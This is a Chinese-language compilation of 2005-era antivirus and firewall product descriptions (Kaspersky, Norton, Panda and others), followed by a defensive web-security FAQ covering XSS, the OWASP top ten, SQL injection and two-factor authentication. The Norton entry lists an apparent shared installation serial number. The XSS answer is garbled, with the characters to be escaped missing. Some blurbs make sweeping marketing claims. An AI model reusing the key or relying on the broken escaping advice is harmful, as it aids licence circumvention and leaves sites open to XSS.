卡巴斯基(Kaspersky Internet Security) 2006 6.0.9.96汉化版

软件大小：9005K
软件语言：简体中文
授权方式：免费版
软件类别：病毒防治
运行环境：Win9x/WinNT/2000/ME/XP
软件介绍：

Kaspersky 为任何形式的个体和社团提供了一个广泛的抗病毒解决方案。它提供了所有类型的抗病毒防护：抗病毒扫描仪，监控器，行为阻段和完全检验。它支持几乎是所有的普通操作系统、e-mail通路和防火墙。Kaspersky控制所有可能的病毒进入端口，它强大的功能和局部灵活性以及网络管理工具为自动信息搜索、中央安装和病毒防护控制提供最大的便利和最少的时间来建构你的抗病毒分离墙。
这是最新的 Kaspersky 安全套装，包括了反病毒、反黑客、反间谍、反垃圾邮件、前摄防御等全套安全工具，可让你的系统高枕无忧。此版是第一个原型测试版，某些功能尚在开发中，估计 BUG较多，请谨慎使用。
汉化注意事项：
1、请先安装原英文软件。
2、建议汉化前退出 KAV应用程序，包括系统栏图标！
3、运行汉化包中的汉化补丁，按正确的安装目录进行汉化（汉化会自动查找安装目录）。必要时请重启动电脑。
4、再次启动 Kaspersky即是中文界面。
5、此次汉化是另加的中文语言包，并保留原英文和俄文的语言。
6、在反黑客的设置中，因原程序原因，规则配置一栏不能汉化，否则在规则描述中原来可修改的值的顺序会被打乱。只有等下一版官方解决了这个问题才行。

Norton2005 安全特警简体中文正式版（含防火墙）

软件语言： 简体中文
软件类型： 国外软件 /免费版
运行环境： Win9X/Me/WinNT/2000/XP
授权方式： 正式版
软件大小： 174.25MB

有力防护病毒、蠕虫和特洛伊木马程序
诺顿防病毒软件2005包含新的互联网蠕虫防护，保护个人和家庭工作室用户不受迅速传播的新型混合互联网蠕虫的攻击，即使这些病毒可以通过多个入口攻击计算机用户的系统。将蠕虫阻止技术应用到下一层，互联网蠕虫防护可以阻止联网端口以防止诸?quot;震荡波”，”MyDoom”和”冲击波”威胁的传播，而这些病
毒通常通过传统的防病毒解决方案防护不到的系统漏洞，进行自身传播。

诺顿防病毒软件2005将继续提供可靠的自动服务，无需用户干预，就可以扫描和清除病毒、蠕虫和特洛伊木马程序。诺顿防病毒软件2005还包含间谍软件检测功能，抵御用户计算机上那些被用来恶意泄漏系统安全、监视用户隐私数据或跟踪用户联机行为的程序。

对黑客和隐私窃贼的必要防护
诺顿个人防火墙2005采用了新的机密信息阻止工具，提供增强的隐私控制，因此可以直接保护用户隐私免遭侵害，甚或是最微小的干扰。新特性支持用户不中断地发送机密信息到他们信任的网站；当用户发送个人数据到不可信任的网站时，则发出警告。机密信息阻止技术有助于防止用户成为网页仿冒的牺牲品。网页仿冒是一种欺诈，它引诱互联网用户向有害并具有潜在威胁的网站提供机密的个人信息，从而导致用户身份被窃。

赛门铁克强健的入侵防护技术是诺顿个人防火墙2005的另一个关键配置。它提供重要的附加安全层，可以结合软件的防火墙，从而预先识别潜在的攻击。这一附加防护层支持诺顿个人防火墙2005仔细监测实际互联网流量，以便有效地识别和阻止联网攻击的尝试。这些，是一个基本的没有入侵防护的防火墙所无法做到的。

全面的电子邮件过滤解决方案
由于垃圾邮件持续激增，并日益成为一种安全威胁，赛门铁克最新的增强型诺顿反垃圾邮件2005将提供更强的过滤能力来解决电子邮件用户最常见的担心。诺顿反垃圾邮件2005将对某些形式的电子邮件欺诈提供更多的保护，它识别在电子邮件消息内的欺诈的URL互联网地址，并过滤这些信息中的欺骗性的、虚假的发送方地址。用户还可以选择过滤色情垃圾邮件，这样，不想要的内容永远不会抵达收件箱。他们也可以使用诺顿反垃圾邮件2005中基于语言的新型过滤器来阻止特定语言的电子邮件信息。

诺顿反垃圾邮件2005将持续发挥作用，在大多数pop3连接中自动拦截和分析电子邮件，并在抵达用户收件箱时识别垃圾邮件。诺顿反垃圾邮件2005将紧密地和最新版本的微软Outlook，Outlook Express、Eudora以及Yahoo! Web email集成在一起，自动创建一个垃圾邮件目录来收集所有检测出的垃圾邮件。诺顿反垃圾邮件2005甚至将在微软Outlook接受Hotmail和MSN邮件时过滤垃圾邮件。这样，用户不仅节省了时间，还可以不受垃圾邮件可能包含的误导信息和不宜内容的干扰。
最完整的多合一安全和隐私保护套件
将诺顿防病毒软件2005、诺顿个人防火墙2005和诺顿反垃圾邮件2005无缝集成到一个软件套件后，诺顿网络安全特警2005将提供完整、自动的保护，可以针对最复杂的互联网威胁提供保护。诺顿网络安全特警2005还包含新的爆发警报，为用户带来附加好处–当威胁级别高的病毒爆发时，用户将自动接收到警报信息。爆发警报将分析用户PC机的安全状态，必要时立刻提供推荐方案强化防护。此外，诺顿网络安全特警2005将通过简单易用的网页内容过滤功能，能够使孩子和家庭不受少儿不宜或色情网站的影响。
安装序列号：BBC2-YGJP-X4B9-PBCM-VH6G-DYKD

天网防火墙个人版是个人电脑使用的网络安全程序，根据管理者设定的安全规则把守网络，提供强大的访问控制、信息过滤等功能，帮你抵挡网络入侵和攻击，防止信息泄露。天网防火墙把网络分为本地网和互联网，可针对来自不同网络的信息，来设置不同的安全方案，适合于任何方式上网的用户。

1)严密的实时监控
天网防火墙（个人版）对所有来自外部机器的访问请求进行过滤，发现非授权的访问请求后立即拒绝，随时保护用户系统的信息安全。
2)灵活的安全规则
天网防火墙（个人版）设置了一系列安全规则，允许特定主机的相应服务，拒绝其它主机的访问要求。用户还可以根据自已的实际情况，添加、删除、修改安全规则，保护本机安全。
3)应用程序规则设置
新版的天网防火墙增加对应用程序数据包进行底层分析拦截功能，它可以控制应用程序发送和接收数据包的类型、通讯端口，并且决定拦截还是通过，这是目前其它很多软件防火墙不具有的功能。
4)详细的访问记录和完善的报警系统
天网防火墙（个人版）可显示所有被拦截的访问记录，包括访问的时间、来源、类型、代码等都详细地记录下来，你可以清楚地看到是否有入侵者想连接到你的机器，从而制定更有效的防护规则。与以往的版本相比，天网防火墙（个人版）设置了完善的声音报警系统，当出现异常情况的时候，系统会发出预警信号，从而让用户作好防御措施。

方正熊猫入侵防护个人版(TruPrevent) 2005

文件大小：17.71M
运行平台：Windows9X/ME/NT/2000/XP

方正熊猫入侵防护个人版2005（即TruPrevent）是方正安全公司联手欧洲熊猫软件为2005年推出的一款新品。产品基于“专门针对未知病毒和攻击而设计”的智能识别技术，即是通过采用“行为分析技术”鉴别文件是否具有危险性或攻击性，即使那些诸如冲击波、振荡波之流的未知病毒亦能够有效隔离。该技术改变了传统杀毒软件所使用的“响应式”技术（被动查杀），转而通过对程序行为的主动跟踪和分析，从而判断是否为病毒或攻击并对之相应做出防范措施。该产品面向家庭用户和SOHU用户，是针对个人PC的一款预防性安全解决方案。
朝华•安博士（VirusClean）是朝华软件应用服务有限公司与韩国安博士有限公司联合开发的针对Win 9X/Me/2000 Professional /XP 客户端专用的计算机杀毒软件。与国内外众多杀毒软件相比，VirusClean不仅提供最快而最强有力的病毒查/杀功能，而且还可以监控、检测并修复互联网上收到的各种数据及文件中的病毒。VirusClean内置了具有国际离领先技术的WARP防病毒引擎，因此误报率的可能性极少，而且具有出色的文件恢复功能。

所获奖项：计算机世界——获“2003年中国信息安全优秀解决方案”
软件世界——获“2003年中国电子政务十佳防病毒解决方案”
中国计算机报——与“趋势”一起获得“2003年值得信赖防病毒品牌”
中国软件评测中心——以杀毒最快、资源占用最少获最高15颗星的“技术创新

东方卫士2005（完整功能）下载版最先支持WindowsXP推出的SP2服务包，与SP2的安全中心进行了防毒认证，是最先获得微软认证的防毒软件之一。
能够和WindowsXP SP2安全中心状态形成互动，及时提醒防毒软件是否过期。
东方卫士2005（完整功能）下载版不仅延续了“一防、二杀、三恢复”的防毒理念，在防毒功能和特色功能上作了深入改进，真正做到了安全、稳定、易用！
东方卫士2005（完整功能）下载版防毒产品是完整功能版，而且便于下载（5.81MB）。
目前免费使用，免费升级！

冰盾防火墙是全球第一款具备IDS入侵检测功能的专业级抗DDOS防火墙，来自IT技术世界一流的美国硅谷，由华人留学生Mr.Bingle Wang和Mr.Buick Zhang设计开发，采用国际领先的生物基因鉴别技术智能识别各种DDOS攻击和黑客入侵行为，防火墙采用微内核技术实现，工作在系统的最底层，充分发挥CPU的效能，仅耗费少许内存即获得惊人的处理效能。经高强度攻防试验测试表明：在抗DDOS攻击方面，工作于100M网卡冰盾约可抵御每秒25万个SYN包攻击，工作于1000M网卡冰盾约可抵御160万个SYN攻击包；在防黑客入侵方面，冰盾可智能识别Port扫描、Unicode恶意编码、SQL注入攻击、Trojan木马上传、Exploit漏洞利用等2000多种黑客入侵行为并自动阻止。冰盾防火墙的主要防护功能如下：

★ 阻止DOS攻击：TearDrop、Land、Jolt、IGMP Nuker、Boink、Smurf、Bonk、BigPing、OOB等数百种。
★ 抵御DDOS攻击：SYN/ACK Flood、UDPFlood、ICMP Flood、TCP Flood等所有流行的DDOS攻击。
★ 拒绝TCP全连接攻击：自动阻断某一IP对服务器特定端口的大量TCP全连接资源耗尽攻击。
★ 防止脚本攻击：专业防范ASP、PHP、PERL、JSP等脚本程序的洪水式Flood调用导致数据库和WEB崩溃的拒绝服务攻击。
★ 对付DDOS工具：XDOS、HGOD、SYNKILLER、CC、GZDOS、PKDOS、JDOS、KKDOS、SUPERDDOS、FATBOY、SYNKFW等数十种。
★ 超强Web过滤：过滤URL关键字、Unicode恶意编码、脚本木马、防止木马上传等。
★ 侦测黑客入侵：智能检测Port扫描、SQL注入、密码猜测、Exploit利用等2000多种黑客入侵行为并阻断
全球最畅销的杀毒软件之一，McAfee防毒软件,除了操作介面更新外,也将该公司的WebScanX功能合在一起,增加了许多新功能!除了帮你侦测和清除病毒，它还有VShield自动监视系统，会常驻在System Tray，当你从磁盘、网络上、E-mail夹文件中开启文件时便会自动侦测文件的安全性，若文件内含病毒，便会立即警告，并作适当的处理，而且支持鼠标右键的快速选单功能，并可使用密码将个人的设定锁住让别人无法乱改你的设定。

木马分析专家能自动分析、终止可疑进程、窗体类型及木马详细资料(如创建时间,文件大小,分析Config.sys、Autoexec.bat、Winstart.bat、System.ini、Win.ini、注册表Load键值等),并能随时在线升级木马病毒代码特征库,100%查杀各种未知木马。另外，木马分析专家个人防火墙为您的计算机提供全面的保护，有效地监控任何网络连接。通过过滤不安全的服务，防火墙可以极大地提高网络安全，同时减小主机被攻击的风险。使系统具有抵抗外来非法入侵的能力，防止您的计算机和数据遭到破。
2005最新功能有：新增显示与进程及窗体相关的所有详细信息：包括进程ID、优先级、包含的线程数、包含的模块数、进程文件大小、创建时间、访问时间、修改时间、文件的版本信息等。新增(IE/木马)个人防火墙,在线杀毒。最新版加强了对第五代木马的分析与查杀,能完美的查杀各种无进程,捆绑木马。木马分析专家不仅是查杀木马工具,更是一个安全分析审核工具,它提供了十余种安全审核功能,将许多安全审核工作集成于一身,可以帮助您迅速判断本机的安全状况,大大方便您的工作。防火墙新增对第2代反弹型木马的监控。
现在有些木马以系统服务及Dll线程方式伪装插入IE或Explorer等正常进程中，使得这些病毒在正常模式下根本无法完全清除，因为你要杀死它之前必需先杀掉正常进程才行，但在安全模式下Windows只加载系统本身的模块，这时木马病毒也就无处隐藏了，这也是许多杀毒软件建议在安全模式下进行查杀的主要原因。分析以上原理，我们创新出一种无需进入安全模式却有着与它同样或更好效果的【天下无马】查杀模式，该功能主要针对：正常模式下无法清除的已知、未知及杀之过后又来的恶性木马病毒。新增加入防止被木马病毒封杀功能，而且在清除病毒的同时，会自动清理DLL、OCX等木马控件在注册表中的捆绑信息

木马防线2005是安天公司推出的一款面向个人用户的专业级反木马信息安全 产品，也是国内首款通过公安部权威检测的同类软件。该软件的英文版Antiy Ghostbusters于2001年在欧美地区发布，当年就成为全球AntiVirus TOP 50中唯一的上榜中国产品。并在全球木马查杀、反间谍工具排行中遥遥领先，获得多次海内外专业媒体盛誉

 

 

 

 

 

作为网站管理者应当如何防范XSS?

坚决不要相信任何用户输入并过滤所有特殊字符。这样既可消灭绝大部分的XSS攻击。另一个建议是输出页面时将 变换成 。要记住，XSS漏洞极具破坏性，一旦被利用，它会给你的事业带来极大的损害。攻击者会将这些漏洞公之于众，这会在用户隐私的问题上大大降低你的网站的用户信赖度。当然，仅仅将( 和 ) 变换成 是不够的，最好将( 和 ) 变换成 ( 和 )，#和 & 变换成 # 和 &。

 

 

 

常见的Web漏洞有哪些?

用户验证漏洞：没有正确的对用户进行验证
2. 用户凭证管理问题：没有正确的对用户凭证进行创建，保存，传输和保护，用户凭证包括用户密码等
3. 权限，特权以及访问控制漏洞
4. 缓存漏洞
5. 跨站脚本漏洞
6. 加密漏洞
7. 路径切换漏洞，用户输入可以包含”..”等字符来对应用程序路径进行切换和读取
8. 代码注入漏洞
9. 配置漏洞
10. 数据泄漏和信息
11. 输入验证漏洞
12. 操作系统命令脚本注入
13. 资源管理漏洞：允许用户操作过多的服务器资源，比如CPU，内存等等
14.  SQL注入
15. 链接跟踪：允许用户直接用链接访问或者下载用户不该访问的文件

 

 

 

Web应用常见的安全漏洞有哪些?

随着存在安全隐患的Web应用程序数量的骤增，Open Web Application Security Project（开放式Web应用程序安全项目，缩写为OWASP）总结出了现有Web应用程序在安全方面常见的十大漏洞，以提醒企业及其程序开发人员尽量避免它们给企业IT系统带来的安全风险：
非法输入 Unvalidated Input

失效的访问控制 Broken Access Control

失效的账户和线程管理 Broken Authentication and Session Management

跨站点脚本攻击 Cross Site Scripting Flaws

缓存溢出问题 Buffer Overflows

注入式攻击 Injection Flaws

异常错误处理 Improper Error Handling

不安全的存储 Insecure Storage

程序拒绝服务攻击 Application Denial of Service

不安全的配置管理 Insecure Configuration Management

 

 

非法输入 Unvalidated Input
在数据被输入程序前忽略对数据合法性的检验是一个常见的编程漏洞。随着OWASP对Web应用程序脆弱性的调查，非法输入的问题已成为大多数Web应用程序安全漏洞方面的一个普遍现象。

失效的访问控制 Broken Access Control
大部分企业都非常关注对已经建立的连接进行控制，但是，允许一个特定的字符串输入可以让攻击行为绕过企业的控制。

失效的账户和线程管理 Broken Authentication and Session Management
有良好的访问控制并不意味着万事大吉，企业还应该保护用户的密码、会话令牌、账户列表及其它任何可为攻击者提供有利信息、能帮助他们攻击企业网络的内容。

跨站点脚本攻击 Cross Site Scripting Flaws
这是一种常见的攻击，当攻击脚本被嵌入企业的Web页面或其它可以访问的Web资源中，没有保护能力的台式机访问这个页面或资源时，脚本就会被启动，这种攻击可以影响企业内成百上千员工的终端电脑。

缓存溢出问题 Buffer Overflows
这个问题一般出现在用较早的编程语言、如C语言编写的程序中，这种编程错误其实也是由于没有很好地确定输入内容在内存中的位置所致。

注入式攻击 Injection Flaws
如果没有成功地阻止带有语法含义的输入内容，有可能导致对数据库信息的非法访问，在Web表单中输入的内容应该保持简单，并且不应包含可被执行的代码。

异常错误处理 Improper Error Handling
当错误发生时，向用户提交错误提示是很正常的事情，但是如果提交的错误提示中包含了太多的内容，就有可能会被攻击者分析出网络环境的结构或配置。

不安全的存储 Insecure Storage
对于Web应用程序来说，妥善保存密码、用户名及其他与身份验证有关的信息是非常重要的工作，对这些信息进行加密则是非常有效的方式，但是一些企业会采用那些未经实践验证的加密解决方案，其中就可能存在安全漏洞。

程序拒绝服务攻击 Application Denial of Service
与拒绝服务攻击 (DoS)类似，应用程序的DoS攻击会利用大量非法用户抢占应用程序资源，导致合法用户无法使用该Web应用程序。

不安全的配置管理 Insecure Configuration Management
有效的配置管理过程可以为Web应用程序和企业的网络架构提供良好的保护。

以上十个漏洞并不能涵盖如今企业Web应用程序中的全部脆弱点，它只是OWASP成员最常遇到的问题，也是所有企业在开发和改进Web应用程序时应着重检查的内容。

 

 

 

 

防御和检查SQL注入的主要手段有哪些?

在代码中使用参数化的过滤性语句
2.避免使用解释程序
3.防范SQL注入，对应用程序的异常进行包装处理，避免出现一些详细的错误消息
4.使用专业的漏洞扫描工具对服务器和应用程序进行安全扫描。
5.在Web应用程序开发过程的所有阶段实施代码的安全检查

 

 

 

什么是网络安全中的双因素认证?

双因素是密码学的一个概念，从理论上来说，身份认证有三个要素：
第一个要素（所知道的内容）： 需要使用者记忆的身份认证内容，例如密码和身份证号码等。
第二个要素（所拥有的物品）：使用者拥有的特殊认证加强机制，例如动态密码卡（令牌），IC卡，磁卡等。
第三个要素（所具备的特征）：使用者本身拥有的惟一特征，例如指纹、瞳孔、声音等。
单独来看，这三个要素中的任何一个都有问题。“所拥有的物品”可以被盗走；“所知道的内容”可以被猜出、被分享，复杂的内容可能会忘记；“所具备的特征”最为强大，但是代价昂贵且拥有者本身易受攻击，一般用在顶级安全需求中。把前两种要素结合起来的身份认证的方法就是“双因素认证”。
双因素认证和利用自动柜员机提款相似：使用者必须利用提款卡(认证设备)，再输入个人识别号码(已知信息)，才能提取其账户的款项。 由于需要用户身份的双重认证，双因素认证技术可抵御非法访问者，提高认证的可靠性。简而言之，该技术降低了电子商务的两大风险：来自外部非法访问者的身份欺诈和来自内部的更隐蔽的网络侵犯。